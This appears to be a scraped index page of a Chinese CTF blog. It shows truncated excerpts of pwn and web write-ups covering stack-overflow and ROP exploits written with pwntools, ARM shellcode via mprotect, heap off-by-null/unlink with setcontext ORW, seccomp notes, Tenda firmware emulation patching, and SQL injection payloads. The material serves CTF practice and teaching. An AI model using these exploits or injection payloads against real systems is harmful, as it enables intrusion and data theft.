偏有宸机

Stackpwn1 checksec什么保护都没开，到程序里发现有个fun函数可以调用shell，那我们直接覆盖rip指向这里就可以了 EXP 123456789from pwn import *#sh = process("./pwn1")sh = remote("node3.buuoj.cn",29918)payload = "a"*23payload +=p64(0x0000000000401198)+p64(0x0000000000401186)#sh.recvuntil("put\n")sleep(2)sh.sendline(payload)sh.interactive() 这里有点不太明白，为什么直接将rip指向0x401186就不可以 warmup_csaw_2016 和上一个类似程序中有个sub_40060d的函数可以直接查看flag，控制eip指向这个函数即可 EXP 12345678from pwn import *sh = process("./warmup_ ...

https://down.tendacn.com/uploadfile/201401/AC15/US_AC15V1.0BR_V15.03.1.16_multi_TD01.rar 固件修复1. 修复运行 首先拿到固件解包后，可以尝试使用qemu-arm-static使固件中的web服务运行 发现程序到welcome to这里就会卡住，我们可以将其拖到ida中进行分析卡住原因 根据字符串查找可以看到后面跟着一个循环，当check_network小于0时，便会一直执行sleep函数卡住，我们只需要用ida中的patch功能将其稍微修改一下，将汇编语句mov r3，r0 修改为mov r3，1 让其通过后续的判断比较 即可继续执行后续的流程 2. 监听IP修复 之后就可以通过qemu-arm-static运行了，但是会发现服务的监听ip是一个广播地址，而这个问题则会导致我们访问不到运行起来的web服务 继续打开ida分析，使用字符串搜索，确定问题所在位置 指向了函数sub_1a36c，其中ip得值最终归宿到a1来确定 那么便利用交叉引用来查看调 ...

程序分析-Shanghai2018_baby_arm惯例checksec 首先看到的是一个64位arm的程序，在使用qemu用户态启动程序时其命令也稍有区别 1❯ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -g 1234 pwn 运行起来看就是两次输出，接下来我们到ida中来分析 第一次的read是将数据写到了一个bss段中 而第二次read时便出现了很明显的栈溢出漏洞 对此第一个想法就是ret2shellcode 将shellcode写到第一次输入的点中，在第二次输入时控制pc跳转到该地址执行shellcode 但是不尽人意之处便是该地址并无可执行权限，也就是说即使跳转到该地址也无法执行我们的shellcode 此时返回ida继续分析，可以看到程序中还存在一个mprotect函数，这就是我们的转折点，可以利用该函数来讲bss段地址的权限改为可读可写可执行，那样就可以执行我们的shellcode了 漏洞利用Arch64中类似x86 csu_init的代码段首先由于程序中找不到可以直接控制x1、x2、x3寄存器的gadgets，因此便只 ...

Xman2018-pwn程序开启了canary保护，不过存在两次输入的情况，可以利用第一次的输入来带出canary的值，用于第二次输入时的溢出。 经过在gdb中的测试可得知前面填充0x18个字符串，即可带出canary的值 之后由于程序中存在system和/bin/sh字符串的原因，我们可以直接拼接rop来完成溢出 但前提是我们需要有足够的gadgets来保持堆栈平衡，而构造rop的结构则应该为 12R0 -> /bin/shPc -> system_plt 但是由于找不到pop r0寄存器的原因，则只能迂回利用r7寄存器保存/bin/sh字符串，再通过mov r0，r7 来保存到r0 寄存器中 因此需要先找到下面三条gadgets 123pop_r3_pc = 0x000104a8 # 0x000104a8 : pop {r3, pc}pop_r4_to_pc = 0x00010804 # 0x00010804 : pop {r4, r5, r6, r7, r8, sb, sl, pc}mo ...

F | [强网先锋]shellcode | 偏有宸机类原题，可以参考文章https://xz.aliyun.com/t/6645前半部分的汇编写法，通过retf切换到32位来执行open打开flag文件再切换到64位read将falg读取到程序中，之后的做法就要稍有改动，因为不能直接使用write，所以这里的思路就是蓝帽杯chall题目的做法，编写汇编指令逐字节比较，进行暴破 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391 ...

程序分析checksec保护全开 且存在沙箱，禁用了execve ida分析程序 有增删改查功能的存在 但show与edit功能同样只能使用一次，且edit功能可以触发后门，在free_hook-0x10处写入0x7f delete功能free过后指针清零 add功能限制申请的堆块不能超过0x70，但是可以利用offbynull 利用思路 offbynull进行unlink 利用程序预设，先申请两个大堆块记作chunk_0和chunk_1 free掉chunk_0，利用残留main_arena 泄露libc地址 之后申请多次堆块距填满还差一个的时候，利用offbynull，形成一个可控的且处于free状态的堆块（同时对其填入main_arena+96-0x18与main_arena+96-0x10，用于unlink） 由于上面的offbynull，导致chunk_1也被影响，需要在末尾伪造size位进行修复 最后进行unlink，控制堆块落到free_hook 利用setcontext执行orw 将setcontext+53写入到free_hook 新建0x5 ...

C沙箱简介在ctf中常见的实现沙箱的机制有两种，一种是prctl函数调用，另一种就是seccomp库函数 而其一般都会禁用execve函数，使之无法直接getshell 在严格模式下甚至只支持exit()，sigreturn()，read()和write()的使用，使用其他系统调用都将会杀掉进程 对于过滤模式下，就可以指定允许使用哪些系统调用，规则是bpf，具体可以使用seccomp-tools查看 prctl函数调用可以通过第一个参数控制程序进程去做什么，该参数常见得为38和22两种情况 1prctl(38, 1LL, 0LL, 0LL, 0LL); 第一个参数为38，第二个参数为1时，禁用execve且子进程一样 1prctl(22, 2LL, &v1); 第一个参数为22 第二个参数为1时，只允许调用read/write/_exit(not exit_group)/sigreturn这几个syscall 第二个参数为2时，则为过滤模式，其中对syscall的限制通过参数3的结构体来自定义过滤规则 seccomp首先对seccomp进行初始化 1v1 = ...

Web | easy sql |直接用sqlmap跑，跑出来报错注入并且得到库名是 security 表名是 flag 测试发现information和sys都被过滤了，绕过就好了。 开始查询字段： 123Submit=%E7%99%BB%E5%BD%95&passwd=' and ((select * from (select * from security.flag a join security.flag b using (no,id))c))||'&uname=%E2%80%99 得到字段后开始查询flag：payload–> 12345Submit=%E7%99%BB%E5%BD%95&passwd='|| extractValue(1,(select `0d479ba3-d155-4d91-948b-9a786bc92dea` from flag)) ||'&uname=%E2%80%99 得到flag： | easy_source |扫描源码发现.index.php.swo备份文件： ...

题目分析存在增删改查功能 add 最大申请0x80的堆块，且不能超过16个 dele free堆块后未作清零操作，存在uaf show 只能show1次 edit 功能只能修改2次 利用思路泄露堆块基址由于程序中dele功能free掉堆块后并未对指针做清空操作，所以这里直接可以打印出safe-linking后的堆块基地址 1234567add(0x80,"a"*8) dele()show()heap_base = u64(sh.recv(6).ljust(8,"\x00"))*0x1000# heap_base = u64(sh.recv(6).ljust(8,"\x00"))<<12 log.info("heap_base => 0x%x",heap_base)tcache_addr = heap_base + 0x10 # 避过tcache的size位 绕过safe-linking及泄露main_arena利用uaf申请堆块到tcache的结构体中，这里绕过saf ...